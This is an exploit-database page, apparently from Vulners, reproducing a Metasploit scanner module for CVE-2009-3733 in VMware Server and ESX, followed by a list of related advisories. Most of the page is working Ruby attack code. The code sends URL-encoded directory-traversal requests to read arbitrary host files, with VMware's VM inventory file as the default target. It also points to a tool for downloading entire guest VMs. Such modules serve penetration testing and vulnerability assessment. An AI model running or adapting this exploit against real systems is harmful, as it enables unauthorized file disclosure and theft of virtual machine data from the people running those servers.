Vulners
Lucene search
VMware Server Directory Traversal
🗓️ 31 Aug 2024 00:00:00Reported by CG, metasploit.comType 
packetstorm🔗 packetstormsecurity.com👁 248 Views
| Reporter | Title | Published | Views | Family All 28 |
|---|---|---|---|---|
 | CVE-2009-3733 | 27 Oct 200900:00 | – | circl |
 | CVE-2009-3733 | 2 Nov 200915:00 | – | cve |
 | CVE-2009-3733 | 2 Nov 200915:00 | – | cvelist |
 | DSquare Exploit Pack: D2SEC_VMWARE | 2 Nov 200915:30 | – | d2 |
| DSquare Exploit Pack: D2SEC_VMWARE_DIRTRAV | 2 Nov 200915:30 | – | d2 |
 | Vmware Server File Disclosure | 18 Mar 201200:00 | – | dsquare |
 | VMware Server 2.0.1 / ESXi Server 3.5 - Directory Traversal | 27 Oct 200900:00 | – | exploitdb |
 | VMware Server 2.0.1 ESXi Server 3.5 - Directory Traversal | 27 Oct 200900:00 | – | exploitpack |
 | GLSA-201209-25 : VMware Player, Server, Workstation: Multiple vulnerabilities | 1 Oct 201200:00 | – | nessus |
| VMware Host Agent Directory Traversal (VMSA-2009-0015) | 17 Feb 201000:00 | – | nessus |
10
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
# Exploit mixins should be called first
include Msf::Exploit::Remote::HttpClient
# Scanner mixin should be near last
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
def initialize
super(
'Name' => 'VMware Server Directory Traversal Vulnerability',
'Description' => 'This modules exploits the VMware Server Directory Traversal
vulnerability in VMware Server 1.x before 1.0.10 build 203137 and 2.x before
2.0.2 build 203138 on Linux, VMware ESXi 3.5, and VMware ESX 3.0.3 and 3.5
allows remote attackers to read arbitrary files. Common VMware server ports
80/8222 and 443/8333 SSL. If you want to download the entire VM, check out
the gueststealer tool.',
'Author' => 'CG' ,
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2009-0015.html' ],
[ 'OSVDB', '59440' ],
[ 'BID', '36842' ],
[ 'CVE', '2009-3733' ],
[ 'URL', 'http://fyrmassociates.com/tools/gueststealer-v1.1.pl' ]
]
)
register_options(
[
Opt::RPORT(8222),
OptString.new('FILE', [ true, "The file to view", '/etc/vmware/hostd/vmInventory.xml']),
OptString.new('TRAV', [ true, "Traversal Depth", '/sdk/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E']),
])
end
def run_host(target_host)
begin
file = datastore['FILE']
trav = datastore['TRAV']
res = send_request_raw({
'uri' => trav+file,
'version' => '1.1',
'method' => 'GET'
}, 25)
if res.nil?
print_error("Connection timed out")
return
end
if res.code == 200
#print_status("Output Of Requested File:\n#{res.body}")
print_good("#{target_host}:#{rport} appears vulnerable to VMWare Directory Traversal Vulnerability")
report_vuln(
{
:host => target_host,
:port => rport,
:proto => 'tcp',
:name => self.name,
:info => "Module #{self.fullname} reports directory traversal of #{target_host}:#{rport} with response code #{res.code}",
:refs => self.references,
:exploited_at => Time.now.utc
}
)
else
vprint_status("Received #{res.code} for #{trav}#{file}")
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e
print_error(e.message)
rescue ::Timeout::Error, ::Errno::EPIPE
end
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
31 Aug 2024 00:00Current
7High risk
Vulners AI Score7
CVSS 25
EPSS0.9006